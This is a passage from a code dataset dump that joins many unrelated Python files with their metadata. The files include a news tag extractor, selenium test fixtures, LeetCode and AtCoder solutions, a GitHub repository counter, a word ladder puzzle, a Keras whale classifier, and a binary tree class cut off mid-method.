module\n\ndef get_object(object_name, path=None):\n \"\"\"Attempt to load the given object, using additional path information if given.\"\"\"\n\n try:\n (modspec, symbol) = object_name.rsplit('.', 1)\n except ValueError:\n # no period found\n raise ValueError(\"object_name name must be in the form 'module.symbol'\")\n \n log.debug('attempting to load %r from %r' % (symbol, modspec))\n module = load_module(modspec, path)\n \n # This will raise AttributeError (as expected) if the symbol is not in the module\n return getattr(module, symbol)\n","sub_path":"lib/west_tools/westpa/extloader.py","file_name":"extloader.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82756699","text":"import re\nimport unittest\n\n__all__ = [ 'extractTags', 'displayTags', 'replaceInternal', 'isSymbol' ]\n\nRAW_TAGS = [\n # General types of story\n { 'tag': 'video(s)', 'host': { 'youtube.com', 'vimeo.com' } },\n 'music', \n 'audio', \n 'tutorial(s)', \n 'media', \n 'rfc',\n { 'tag': 'release', 'alt': { 'released', 'releases' } },\n 'game(s)',\n\n # General concepts\n 'algorithm(s)', \n 'compiler(s)', \n { 'tag': '3d', 'alt': ['3 d', 'three dimension(s)', 'three dimensional'] }, \n 'hash', \n 'web', \n 'api',\n 'spam',\n\n # Concrete concepts\n 'drm', \n 'nosql', \n 'sql', \n 'copyright(s)', \n 'trademark(s)', \n 'patent(s)', \n 'encryption', \n 'economy', \n 'investing',\n 'privacy', \n 'autism', \n 'lawsuit', \n 'universe', \n 'assembler(s)', \n 'proxy', \n 'censorship', \n 'firewall', \n 'trial',\n 'piracy', \n 'ipo(s)', \n 'graphics', \n 'embedded', \n 'art', \n 'kernel', \n 'antimatter', \n 'compression',\n 'font(s)',\n 'concurrency',\n 'beer',\n { 'tag': 'debugging', 'alt': [ 'debugger', 'debug', 'debugs' ]},\n\n # Orgs\n 'amd', \n 'intel', \n 'apple', \n 'facebook', \n 'google', \n 'yahoo', \n { 'tag': 'microsoft', 'host': [ 'msdn.com' ] }, \n 'twitter', \n 'zynga',\n \n 'techcrunch', \n 'htc', \n 'amazon', \n 'mozilla', \n 'dell', \n 'nokia', \n 'novell', \n 'lenovo', \n 'nasa',\n \n 'ubuntu', \n 'adobe', \n 'github', \n 'cisco', \n 'motorola', \n 'samsung', \n 'verizon', \n { 'symbol': 'at&t', 'internal': 'atandt' },\n 'sprint', \n 'tmobile',\n \n 'instagram', \n 'square', \n 'stripe', \n 'anonymous', \n 'webkit', \n 'opera', \n 'tesla', \n 'redhat', \n 'centos',\n \n 'gnu', \n 'mpaa', \n 'riaa', \n 'w3c', \n 'isohunt', \n 'obama', \n 'ifpi', \n 'nsa', \n 'cia', \n 'fbi', \n 'csis', \n 'wikileaks',\n \n 'snowden', \n 'kde', \n 'gnome', \n 'comcast', \n 'fcc', \n 'china', \n 'usa', \n 'yale', \n 'navy', \n 'debian',\n \n 'spacex', \n 'turing', \n 'mit', \n 'stanford', \n 'uber', \n 'lyft', \n 'hbo', \n 'sony', \n 'fdic', \n 'ucla', \n 'canada',\n \n 'antarctica', \n 'arctic', \n 'tor', \n 'wolfram', \n 'mojang', \n 'dropbox',\n\n # Languages\n 'php', \n 'javascript', \n 'java', \n 'perl', \n 'python', \n 'ruby', \n 'html', \n 'html5',\n 'css', \n { 'tag': 'css2', 'implies': 'css' }, \n { 'tag': 'css3', 'implies': 'css' }, \n 'flash', \n 'lisp', \n { 'tag': 'clojure', 'implies': 'lisp' }, \n 'racket', \n 'scheme',\n 'arc',\n 'scala', \n 'lua', \n 'haxe', \n 'ocaml', \n 'erlang', \n 'rust', \n 'ecmascript', \n 'haskell', \n 'nim',\n 'prolog',\n { 'tag': 'go', 'alt': 'golang', 'internal': 'golang' }, \n { 'tag': 'c', 'internal': 'clanguage' }, \n { 'tag': 'd', 'internal': 'dlanguage' }, \n { 'symbol': 'c++', 'internal': 'cplusplus' },\n { 'symbol': 'c#', 'internal': 'csharp' },\n { 'symbol': 'f#', 'internal': 'fsharp' },\n 'swift',\n 'nvidia',\n\n # Technologies\n 'linux', \n 'bsd',\n 'mongodb', \n 'cassandra', \n 'hadoop', \n 'android', \n 'node',\n 'iphone', \n 'ipad', \n 'ipod', \n 'ec2', \n 'firefox', \n 'safari', \n 'servo',\n { 'tag': 'chrome', 'alt': 'chromium' }, \n 'windows', \n { 'tag': 'mac', 'alt': 'macintosh' }, \n 'osx',\n 'git', \n 'subversion', \n 'mercurial', \n { 'tag': 'neovim', 'implies': 'vim' },\n 'vim',\n { 'tag': 'vi', 'internal': 'vieditor' },\n 'emacs', \n 'bitcoin', \n 'drupal', \n 'wordpress', \n 'unicode', \n 'pdf', \n 'wifi', \n 'phonegap', \n 'minecraft', \n 'svg', \n 'gif', \n 'png', \n 'dns', \n 'torrent',\n 'docker', \n 'drone(s)', \n 'meteor', \n 'react', \n { 'tag': 'openbsd', 'implies': 'bsd' }, \n { 'tag': 'freebsd', 'implies': 'bsd' },\n 'sass', \n 'scss', \n 'aes', \n 'rsa',\n { 'tag': 'ssl', 'implies': 'https' }, \n { 'tag': 'tls', 'implies': 'https' }, \n 'http', \n 'https',\n 'smtp', \n 'ftp', \n 'webrtc', \n 'pgp', \n 'gpg', \n 'ios', \n 'ssd', \n 'openssh', \n 'openssl',\n 'bash', \n 'ksh', \n 'zsh', \n { 'tag': 'jpeg', 'alt': 'jpg' },\n 'dbus',\n 'emoji',\n 'mysql',\n { 'tag': 'postgresql', 'alt': 'postgres' },\n 'json',\n 'xml',\n 'yaml',\n 'csv',\n 'arm',\n 'mips',\n 'gpu',\n 'awk',\n 'sed',\n 'ssh',\n 'grep',\n { 'tag': 'regex', 'alt': 'regexp' },\n 'webgl',\n 'glsl',\n { 'tag': 'gmail', 'implies': 'google' },\n\n # Frameworks\n 'django', \n 'rails', \n 'jquery', \n 'prototype', \n 'mootools', \n { 'tag': 'angular', 'alt': 'angularjs' },\n { 'tag': 'ember', 'alt': 'emberjs' }\n]\n\nTAGS = {}\nSYMBOLS = {}\nDISPLAY = {}\nINTERNAL = {}\n\n# Replaces a token that matches an internal's display token with the internal representation\ndef replaceInternal(tokens):\n return [INTERNAL[tag] if INTERNAL.has_key(tag) else tag for tag in tokens]\n\ndef displayTags(tags):\n return [DISPLAY[tag] if DISPLAY.has_key(tag) else tag for tag in tags]\n\ndef isSymbol(token):\n return SYMBOLS[token]['tags'][0] if SYMBOLS.has_key(token) else None\n\n# Note that this may return duplicates\ndef extractTags(s):\n tags = []\n s = s.lower();\n for symbol in SYMBOLS.keys():\n if s.find(symbol) != -1:\n # Eat the symbol so we don't match on it any more\n s = s.replace(symbol, '')\n tags += SYMBOLS[symbol]['tags']\n\n for bit in re.split(\"[^A-Za-z0-9]+\", s):\n if TAGS.has_key(bit):\n tags += TAGS[bit]['tags']\n\n return tags\n\nfor tag_entry in RAW_TAGS:\n if type(tag_entry) == str:\n tag_entry = { 'tag': tag_entry }\n\n symbol = tag_entry.has_key('symbol')\n if symbol:\n tag = tag_entry['symbol']\n else:\n tag = tag_entry['tag']\n output = {}\n\n # Reverse map\n if tag_entry.has_key('internal'):\n DISPLAY[tag_entry['internal']] = tag\n INTERNAL[tag] = tag_entry['internal']\n\n # plural?\n if tag.find('(s)') != -1:\n root = tag.replace('(s)', '')\n input = [ root, root + 's' ]\n output['tags'] = [ root ]\n else:\n input = [ tag ]\n if tag_entry.has_key('internal'):\n output['tags'] = [ tag_entry['internal'] ]\n else:\n output['tags'] = [ tag ]\n\n # implies adds additional output tags for a given input\n if tag_entry.has_key('implies'):\n implies = tag_entry['implies']\n if type(implies) == str:\n output['tags'] += [ implies ]\n else:\n output['tags'] += implies\n\n # alt adds addtional input tags for a given output\n if tag_entry.has_key('alt'):\n alt = tag_entry['alt']\n if type(alt) == str:\n input += [ alt ]\n else:\n for alt in tag_entry['alt']:\n if alt.find('(s)') != -1:\n root = alt.replace('(s)', '')\n input += [ alt, alt + 's' ]\n else:\n input += [ alt ]\n\n if symbol:\n for tag in input:\n if SYMBOLS.has_key(tag):\n raise Exception('Duplicate symbol: ' + tag)\n SYMBOLS[tag] = output\n else:\n for tag in input:\n if TAGS.has_key(tag):\n raise Exception('Duplicate tag: ' + tag)\n TAGS[tag] = output\n\n\nclass TestTags(unittest.TestCase):\n def test_simple(self):\n self.assertEqual(['rust'], extractTags(\"I love Rust!\"))\n\n def test_plural(self):\n self.assertEqual(['video'], extractTags(\"Good old video\"))\n self.assertEqual(['video'], extractTags(\"Good old videos\"))\n\n def test_plural_dupe(self):\n self.assertEqual(set(['video']), set(extractTags(\"Good old video and videos\")))\n\n def test_alt(self):\n self.assertEqual(['chrome'], extractTags(\"Chromium is a project\"))\n self.assertEqual(['angular'], extractTags(\"AngularJS is fun\"))\n\n def test_alt_dupe(self):\n self.assertEqual(set(['chrome']), set(extractTags(\"Chromium is the open Chrome\")))\n\n def test_implies(self):\n self.assertEqual(['neovim', 'vim'], extractTags(\"Neovim is kind of cool\"))\n\n def test_implies_dupe(self):\n self.assertEqual(set(['neovim', 'vim']), set(extractTags(\"Neovim is a kind of vim\")))\n\n def test_internal(self):\n self.assertEqual(['clanguage'], extractTags(\"C is hard\"))\n self.assertEqual(['dlanguage'], extractTags(\"D is hard\"))\n\n def test_symbol(self):\n self.assertEqual(['csharp'], extractTags(\"C# is hard\"))\n self.assertEqual(['cplusplus'], extractTags(\"C++ is hard\"))\n self.assertEqual(['atandt'], extractTags(\"AT&T has an ampersand\"))\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":8854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308696475","text":"# -*- coding: utf-8 -*-\n#\n\nimport os\nimport logging\nimport pytest\nimport time\n\nfrom datetime import datetime\nfrom selenium import webdriver\n\nfrom selenium.webdriver.chrome.options import Options\n\n\nlogging.basicConfig(filename='./webui-auto-allure-test.log', level=logging.INFO, format=\"%(asctime)s [%(levelname)s] [%(module)s:%(lineno)d] [%(name)s]: %(message)s\")\n\ndef pytest_addoption(parser):\n parser.addoption('--language', action='store', default='en',\n help='Please choose localization language')\n parser.addoption('--browser', action='store', default=\"chrome\",\n help=\"Choose browser: chrome or firefox\")\n\n\n@pytest.fixture(scope='function')\ndef browser(request):\n browser_name = request.config.getoption('browser').lower()\n if browser_name == 'chrome':\n logging.info('start chrome browser for test..')\n chrome_options = webdriver.ChromeOptions()\n locale = request.config.getoption('language')\n logging.info(f\"`{locale}` locale selected\")\n chrome_options.add_argument(f\"--lang={locale}\")\n chrome_options.add_experimental_option('prefs', {'intl.accept_languages': locale})\n browser = webdriver.Chrome(options=chrome_options)\n elif browser_name == 'firefox':\n logging.info('start firefox browser for test..')\n browser = webdriver.Firefox()\n else:\n raise NotImplemented(\"Browser {} still is not implemented\".format(browser_name))\n\n yield browser\n\n logging.info('quit browser...')\n browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"340488951","text":"#\n# @lc app=leetcode id=513 lang=python3\n#\n# [513] Find Bottom Left Tree Value\n#\n# https://leetcode.com/problems/find-bottom-left-tree-value/description/\n#\n# algorithms\n# Medium (63.74%)\n# Likes: 1609\n# Dislikes: 190\n# Total Accepted: 144.5K\n# Total Submissions: 226.7K\n# Testcase Example: '[2,1,3]'\n#\n# Given the root of a binary tree, return the leftmost value in the last row of\n# the tree.\n# \n# \n# Example 1:\n# \n# \n# Input: root = [2,1,3]\n# Output: 1\n# \n# \n# Example 2:\n# \n# \n# Input: root = [1,2,3,4,null,5,6,null,null,7]\n# Output: 7\n# \n# \n# \n# Constraints:\n# \n# \n# The number of nodes in the tree is in the range [1, 10^4].\n# -2^31 <= Node.val <= 2^31 - 1\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nimport collections\nclass Solution:\n # solution: BFS - Your runtime beats 65.5 % of python3 submissions\n def findBottomLeftValue(self, root: Optional[TreeNode]) -> int:\n if not root:\n return -1\n\n queue = collections.deque([root])\n ans = root.val\n while queue:\n size = len(queue)\n isFirst = False\n for _ in range(size):\n node = queue.popleft()\n if not isFirst:\n ans = node.val\n isFirst = True\n\n if node.left:\n queue.append(node.left)\n \n if node.right:\n queue.append(node.right)\n \n return ans\n \n\n\n \n# @lc code=end\n\n","sub_path":"Python/513.find-bottom-left-tree-value.py","file_name":"513.find-bottom-left-tree-value.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"474682367","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 28 15:04:48 2021\r\ngitRequest.py - fetch user git repos and numbers of commits per repo\r\n@author: nicholas mirarchi\r\n\"\"\"\r\nimport requests \r\nimport os \r\nimport unittest \r\nimport json \r\n\r\n\r\ndef repository_info(username):\r\n url_for_user='https://api.github.com/users/{}/repos'.format(username)\r\n op=[]\r\n response = requests.get(url_for_user)\r\n if response.status_code != 200:\r\n print(\"Error... Account not found or no repos exist\")\r\n return False\r\n jsonData = json.loads(response.text)\r\n op.append('User: {}'.format(username))\r\n #print(op)\r\n counter=0\r\n try:\r\n for i in jsonData:\r\n repo = jsonData[counter]['name']\r\n url2 = 'https://api.github.com/repos/{}/{}/commits'.format(username, repo)\r\n response2 = requests.get(url2)\r\n response_json = json.loads(response2.text)\r\n #print(len(response_json))\r\n op.append('Repo: {} Number of commits: {}'.format(repo, len(response_json)))\r\n counter+=1\r\n except (TypeError, KeyError, IndexError):\r\n return False\r\n for i in op:\r\n print(i)\r\n return True\r\n\r\n \r\ndef main():\r\n username = input(\"Enter the user Github ID here: \")\r\n repository_info(username)\r\n #token = input(\"Enter Github access token here: \")\r\n#username='nmirarchi12'\r\n\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"HW-04a/gitRequest.py","file_name":"gitRequest.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"250312959","text":"import os\nimport tarfile\n\nhere = os.path.dirname(os.path.abspath(__file__))\n\nfor model in ['null', 'default', '65']:\n for plot_kind in ['metabolite_limitation', 'secretion_keff_sweep',\n 'default', 'glucose_limited']:\n tar_filename = '%s/community_sims_output_%s_keffs/%s.tar.gz' % (here, model, plot_kind)\n if os.path.exists(tar_filename):\n tarfile.open(tar_filename).extractall('%s/community_sims_output_%s_keffs' %\n (here, model))","sub_path":"scripts_figures_and_tables/unpack_community_me_sims.py","file_name":"unpack_community_me_sims.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295188032","text":"from collections import Counter\r\n\r\nn = int(input())\r\ns = [input() for _ in range(n)]\r\n\r\nc = Counter(s)\r\n\r\nans = \"\"\r\nt = 0\r\nfor x,y in c.items():\r\n if y > t:\r\n t = y\r\n ans = x\r\nprint(ans)","sub_path":"Source Codes/AtCoder/abc008/B/4928123.py","file_name":"4928123.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"387765820","text":"import dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom dash.dependencies import Input, Output\nimport numpy as np\nimport pickle\nimport dash_table\n# from dash_dashboards_files.helper_functions import userchoice_based_movie_recommendation\nimport netflix as nmr\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\nmovies_df = nmr.reading_movie_title_csv()\n\ncolors = {\n 'background': 'white',\n 'background1': 'light blue',\n 'text': 'black'\n}\n\n# noinspection PyPackageRequirements,PyPackageRequirements,PyPackageRequirements\ntab2_layout = html.Div(style={'backgroundColor': colors['background']}, children=[\n html.Div(className='div-user-controls',\n children=[\n html.Div(\n className='div-for-dropdown-and-table',\n children=[\n dcc.Dropdown(id='movie_list_input2', options=nmr.get_options(movies_df['Display'].unique()),\n value=[movies_df['Display'].iloc[206]], searchable=True\n )\n ]\n )\n ]\n ),\n html.Div(id='output',\n className='row',\n children=[html.Div(id='my-table2',\n className='six columns')\n ]\n )\n\n]\n)\n\n\n","sub_path":"bingewatch/tab2_dummy.py","file_name":"tab2_dummy.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"216443396","text":"import re\nfrom pathlib import Path\n\nimport pytest\n\nfrom robocop import Config, Robocop\n\n\n@pytest.mark.parametrize(\n \"configuration, expected\",\n [\n (\"not-allowed-char-in-name:pattern:[:]\", re.compile(r\"[:]\")),\n (None, re.compile(r\"[\\.\\?]\")),\n (\"not-allowed-char-in-name:pattern:[:%#]\", re.compile(r\"[:%#]\")),\n (\"not-allowed-char-in-name:pattern:[^a-z]\", re.compile(r\"[^a-z]\")),\n ],\n)\nclass TestConfigureRule:\n def test_configure_with_two_semicolons(self, configuration, expected):\n config = Config(root=str(Path(__file__).parent))\n config.configure = [configuration] if configuration else []\n config.include = [\"not-allowed-char-in-name\"]\n robocop_runner = Robocop(config=config)\n robocop_runner.reload_config()\n # find rule and then associated checker([1]), and compare param\n assert robocop_runner.rules[\"not-allowed-char-in-name\"][1].pattern == expected\n","sub_path":"tests/utest/test_configure_rule.py","file_name":"test_configure_rule.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"72837106","text":"# Assignment 2 - Puzzle Game\n#\n# CSC148 Fall 2015, University of Toronto\n# Instructor: David Liu\n# ---------------------------------------------\n\"\"\"Word ladder module.\n\nRules of Word Ladder\n--------------------\n1. You are given a start word and a target word (all words in this puzzle\n are lowercase).\n2. Your goal is to reach the target word by making a series of *legal moves*,\n beginning from the start word.\n3. A legal move at the current word is to change ONE letter to get\n a current new word, where the new word must be a valid English word.\n\nThe sequence of words from the start to the target is called\na \"word ladder,\" hence the name of the puzzle.\n\nExample:\n Start word: 'make'\n Target word: 'cure'\n Solution:\n make\n bake\n bare\n care\n cure\n\n Note that there are many possible solutions, and in fact a shorter one\n exists for the above puzzle. Do you see it?\n\nImplementation details:\n- We have provided some starter code in the constructor which reads in a list\n of valid English words from wordsEn.txt. You should use this list to\n determine what moves are valid.\n- **WARNING**: unlike Sudoku, Word Ladder has the possibility of getting\n into infinite recursion if you aren't careful. The puzzle state\n should keep track not just of the current word, but all words\n in the ladder. This way, in the 'extensions' method you can just\n return the possible new words which haven't already been used.\n\"\"\"\nfrom puzzle import Puzzle\n\n\nCHARS = 'abcdefghijklmnopqrstuvwyz'\n\n\nclass WordLadderPuzzle(Puzzle):\n \"\"\"A word ladder puzzle.\"\"\"\n\n # === Private attributes ===\n # @type _words: list[str]\n # List of allowed English words\n # @type _start: str\n # The start word\n # @type _target: str\n # The target word\n # @type _states: list[str]\n # List of words that have been tried.\n\n def __init__(self, start, target, states=None, words=None):\n \"\"\"Create a new word ladder puzzle with given start and target words.\n\n @type self: WordLadderPuzzle\n @type start: str\n @type target: str\n @type states: list[str] | None\n @type words: list[str] | None\n @rtype: None\n \"\"\"\n # Code to initialize _words - you don't need to change this.\n if words is None:\n self._words = []\n with open('wordsEnTest.txt') as wordfile:\n for line in wordfile:\n self._words.append(line.strip())\n self._words = set(self._words)\n else:\n self._words = words\n\n self._start = start\n self._target = target\n self._states = []\n if states is not None:\n self._states.extend(states)\n\n def __str__(self):\n \"\"\"Return a human-readable string representation of .\n\n @type self: WordLadderPuzzle\n @rtype: str\n\n >>> w = WordLadderPuzzle('make', 'cure')\n >>> w._ladder = ['make', 'cake', 'care', 'cure']\n >>> print(w)\n make -> cake -> care -> cure\n \"\"\"\n string = \" -> \".join(self._states + [self._start])\n if not self.is_solved():\n string += \" -> ??? -> \" + self._target\n return string\n\n def is_solved(self):\n \"\"\"Return whether this puzzle is in a solved state.\n\n A word ladder puzzle is solved when the target word is reached.\n\n @type self: WordLadderPuzzle\n @rtype: bool\n \"\"\"\n return self._start == self._target\n\n def extensions(self):\n \"\"\"Return a list of possible new states after a valid move.\n\n The valid move must change exactly one character of the\n current word, and must result in an English word stored in\n self._words.\n\n The returned moves should be sorted in alphabetical order\n of the produced word.\n\n @type self: WordLadderPuzzle\n @rtype: list[WordLadderPuzzle]\n \"\"\"\n lst = []\n\n # Change each character in the start word and if the resulting word is\n # in the dictionary (not in the history), add it to the list.\n chars = list(self._start)\n for i in range(len(chars)):\n origin = chars[i]\n for k in CHARS:\n if k != origin:\n chars[i] = k\n word = \"\".join(chars)\n if word not in lst and word not in self._states \\\n and word in self._words:\n lst.append(word)\n chars[i] = origin\n\n # Now construct the extensions with the word in the list.\n extentions = []\n states = self._states + [self._start]\n for word in sorted(lst):\n extentions.append(WordLadderPuzzle(word, self._target, states,\n self._words))\n return extentions\n\n def move(self, move):\n \"\"\"Return a new puzzle state specified by making the given move.\n\n Raise a ValueError if represents an invalid move.\n\n @type self: WordLadderPuzzle\n @type move: str\n @rtype: WordLadderPuzzle\n \"\"\"\n # Check if the word in the move is valid\n possibles = [state._start for state in self.extensions()]\n if move in possibles:\n return WordLadderPuzzle(move, self._target, self._states +\n [self._start])\n else:\n raise ValueError\n\n def from_puzzles_to_move(self, puzzle1, puzzle2):\n \"\"\"An helper function for *hint_by_depth* in the solver.py module.\n\n puzzle1 is the current puzzle state and puzzle2 is a puzzle state after\n a valid move. Return the move that leads from puzzle1 to puzzle2.\n\n @type self: WordLadderPuzzle\n @type puzzle1: WordLadderPuzzle\n @type puzzle2: WordLadderPuzzle\n @rtype: str\n \"\"\"\n words = str(puzzle2).split(' -> ')\n return words[words.index('???') - 1]\n","sub_path":"A2/word_ladder_puzzle.py","file_name":"word_ladder_puzzle.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193923221","text":"# Standard neutral network\n\n# Import some libraries\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import to_categorical\nimport matplotlib .pyplot as plt\nimport pandas as pd\nimport cv2\nimport os\nfrom tqdm import tqdm\n\n\n\n\n# Get the data values from the csv\ndf = pd.read_csv(\"train.csv\")\n\n\n\n\n# Convert the pandas datafram to a numpy array\nnparry = df.to_numpy()\n# There are 25361 images and corresponding labels(thus an array of 25361 by 2)\n\n\n\n\n# Seperate the whale image IDs and the labels(y) into two seperate arrays\nwhale_image_IDs = nparry[:,0]\nlabels = nparry[:,1]\n\n\n\n\n# Declare which folder has the training images\nDATADIR = \"./humpback-whale-identification\"\ncategory = \"train\"\npath = os.path.join(DATADIR, category)\n\n\n\nX_grey_100x100 = np.empty((25361, 100, 100))\n\n\n# This dataset will be black and white, and of size 100x100\nindex = 0\nfor img in tqdm(os.listdir(path)):\n img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_GRAYSCALE)\n new_array = cv2.resize(img_array, (100, 100))\n row_vec = new_array[np.newaxis, :]\n X_grey_100x100[index] = row_vec\n #plt.imshow(new_array)\n #plt.show()\n index += 1\nprint(X_grey_100x100[0].shape)\nprint(X_grey_100x100.shape)\nnp.save('X_grey_100x100', X_grey_100x100)\n\n\n\n\n# We need to create a one-hot encoded data model\ny, uniques = pd.factorize(labels)\nprint(y) #[0, 1, 2, 3, 3, 3, 4 ...]\nprint(uniques) #All unique labels\n\n\n\n\nprint(X_grey_100x100.shape) #(25361, 100, 100)\nprint(labels.shape) #(25361)\n\n\n\n\n# We will flatten the image\nX_grey_100x100 = X_grey_100x100.reshape((-1, 10000))\n\n\n\n\n# We will normlize the image as this helps apparently\nX_grey_100x100 = (X_grey_100x100 / 255) - 0.5\n\n\n\n\n# We will have two dense layers and one output layer\nmodel = Sequential([\n Dense(512, activation='relu', input_shape=(10000,)),\n Dense(512, activation='relu'),\n\n Dense(5005, activation='softmax'),\n])\n\n\n\n\n# The model will use adam as the optimizer, categorical_cross entropy loss\nmodel.compile(\n optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'],\n)\n\n\n\n\n\nhist = model.fit(\n X_grey_100x100, # training data\n to_categorical(y), # training targets\n epochs=5,\n batch_size=256,\n validation_split=0.3\n)\n\n\n\n\n\n# Save the model\nmodel.save_weights('model6.h5')\n\n\n\n\n#Visualize the models accuracy\nplt.plot(hist.history['accuracy'])\nplt.plot(hist.history['val_accuracy'])\nplt.title('Model Accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Val'], loc='upper left')\nplt.show()\n\n\n\n\n#Visualize the models loss\nplt.plot(hist.history['loss'])\nplt.plot(hist.history['val_loss'])\nplt.title('Model Loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Val'], loc='upper right')\nplt.show()\n\n\n\n\nX_grey_100x100_test = np.empty((7960, 100, 100))\n\nDATADIR_test = \"./humpback-whale-identification\"\ncategory_test = \"test\"\npath = os.path.join(DATADIR_test, category_test)\n\n# This dataset will be black and white, and of size 100x100\nindex = 0\nwhale_ids = []\nfor img in tqdm(os.listdir(path)):\n whale_ids.append(img)\n img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_GRAYSCALE)\n new_array = cv2.resize(img_array, (100, 100))\n row_vec = new_array[np.newaxis, :]\n X_grey_100x100_test[index] = row_vec\n #plt.imshow(new_array)\n #plt.show()\n index += 1\nprint(X_grey_100x100_test[0].shape)\nprint(X_grey_100x100_test.shape)\n\n\n\n\n#Flatten and normalize the data\nX_grey_100x100_test = X_grey_100x100_test.reshape((-1, 10000))\nX_grey_100x100_test = (X_grey_100x100_test / 255) - 0.5\n\n\n\n# We will store our guesses in a pandas data frame for now\ndf = pd.DataFrame(columns=['Image', 'Id'])\n# Declare which folder has the testing images\n\n#y_hat = np.empty((, 5005))\n\nindex = 0\nfor img in tqdm(X_grey_100x100_test):\n probabilities = model.predict(np.array([img]))\n #print(probabilities)\n target_index = np.where(probabilities[0] == np.amax(probabilities[0]))\n \n #Get the correct id for that index\n y_guess = uniques[target_index[0][0]]\n img_code = whale_ids[index] \n df.loc[index] = img_code, y_guess\n index +=1\n\n\n\n\n#Save the csv\ndf.to_csv('eighth_try.csv', index=False)\n\n\n\n\n\n\n","sub_path":"neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"488310199","text":"#!/usr/bin/env python\n# https://leetcode.cn/problems/maximum-binary-tree/\nfrom __future__ import annotations\n\nimport unittest\nfrom typing import Optional, List\n\n\nclass TreeNode:\n @staticmethod\n def construct_maximum_binary_tree(nums: List[int]) -> Optional[TreeNode]:\n if 0 == len(nums):\n return None\n\n node = TreeNode(nums[0])\n for num in nums:\n node = node.mbt_add(num)\n\n return node\n\n def __init__(self, val=0, left: Optional[TreeNode] = None, right: Optional[TreeNode] = None, weight=1):\n self.weight = weight\n self.val = val\n self.left = left\n self.right = right\n\n # 构建出根就是最大值的二叉树,可以由此展开联想,在构建二叉树的同时,做一些额外操作,得到有特定问题针对性的二叉树。\n def mbt_add(self, val: int) -> TreeNode:\n if val == self.val:\n self.weight += 1\n return self\n\n if val > self.val:\n new_node = TreeNode(val)\n new_node.left = self\n return new_node\n\n self.right = TreeNode(val) if self.right is None else self.right.mbt_add(val)\n\n return self\n\n def bst_add(self, val: int) -> None:\n node = self\n\n while True:\n if val < node.val:\n if node.left is None:\n node.left = TreeNode(val)\n break\n else:\n node = node.left\n elif node.val < val:\n if node.right is None:\n node.right = TreeNode(val)\n break\n else:\n node = node.right\n else:\n node.weight += 1\n break\n\n def max_value(self) -> int:\n candidates = [self.val]\n\n if self.left is not None:\n candidates.append(self.left.max_value())\n\n if self.right is not None:\n candidates.append(self.right.max_value())\n\n return max(candidates)\n\n def min_value(self) -> int:\n candidates = [self.val]\n\n if self.left is not None:\n candidates.append(self.left.min_value())\n\n if self.right is not None:\n candidates.append(self.right.min_value())\n\n return min(candidates)\n\n def is_valid_bst(self) -> bool:\n if self.left is None and self.right is None:\n return True\n elif self.left is None:\n return self.right.is_valid_bst() and self.val < self.right.min_value()\n elif self.right is None:\n return self.left.is_valid_bst() and self.left.max_value() < self.val\n else:\n return self.left.is_valid_bst() and self.right.is_valid_bst() and self.left.max_value() < self.val < self.right.min_value()\n\n def level_order_traversal_for_value(self) -> List[int]:\n nums = []\n nodes = [self]\n\n while True:\n try:\n node = nodes.pop()\n\n if node is None:\n nums.append(None)\n continue\n\n nums.append(node.val)\n nodes.insert(0, node.left)\n nodes.insert(0, node.right)\n except IndexError:\n break\n finally:\n if all([n is None for n in nodes]):\n break\n\n return nums\n\n def preorder_traversal_for_value(self) -> List[Optional[int]]:\n if self.left is None and self.right is None:\n return [self.val]\n\n left_list = [None] if self.left is None else self.left.preorder_traversal_for_value()\n right_list = [None] if self.right is None else self.right.preorder_traversal_for_value()\n\n return [self.val] + left_list + right_list\n\n def inorder_traversal(self) -> List[TreeNode]:\n operator_expand = 1\n operator_eval = 2\n\n operators = [operator_expand]\n nodes = [self]\n result = []\n\n while True:\n try:\n node = nodes.pop()\n operator = operators.pop()\n except IndexError:\n break\n\n if operator == operator_expand:\n if node.right is not None:\n nodes.append(node.right)\n operators.append(operator_expand)\n\n nodes.append(node)\n operators.append(operator_eval)\n\n if node.left is not None:\n 